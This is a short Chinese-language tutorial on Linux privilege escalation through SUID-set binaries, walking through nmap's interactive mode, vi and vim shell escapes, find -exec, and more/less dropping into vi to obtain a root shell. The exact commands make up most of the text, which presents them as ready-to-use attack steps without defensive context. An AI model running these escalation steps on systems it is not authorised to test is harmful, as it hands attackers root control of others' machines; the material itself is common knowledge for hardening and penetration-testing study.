在Linux中有幾個檔案，一旦具備suid許可權位，將可以被用來進行提權，分別是：Nmap Vi Vim find More Less 

一、nmap

nmap在2.02-5.21之間的版本存在一個互動模式，這個模式允許使用者執行shell命令，具體操作方式如下

1、首先進入互動模式

[email protected]:$nmap --interactive
nmap>

2、通過互動模式進入shell：輸入!sh

nmap>!sh
sh-3.2#

二、Vi

1、啟動Vi在命令模式輸入以下內容

:!sh
sh-3.2#
 

這樣可以直接進入root許可權的shell模式

三、Vim

1、啟動Vim在命令模式下輸入以下內容

:set shell=/bin/sh
:shell

這樣就可以直接進入root許可權的shell模式

四、find

find命令有一個-exec引數，這個引數用於：“當找到對應的檔案後，執行一個系統命令進行處理該檔案”，可以被用來進行提權

[email protected]:$touch test                 #確保可以找到該檔案
[email protected]:$find test -exec "
 
/bin/sh" \;
[email protected]:#

五、more/less

more和less可以被用來進行提權的一個重要因素在於可以從這兩個命令裡進入vim/vi模式

1、先通過more開啟一個檔案

[email protected]:$more testfile

2、這個時候可以按一下鍵盤上的 ‘v’，便可以呼叫Vim/Vi進入編輯模式，這個時候就可以通過vim進行提權，全程都是root許可權：命令模式下輸入“!sh”就可以獲取一個root的shell。參考第二、三條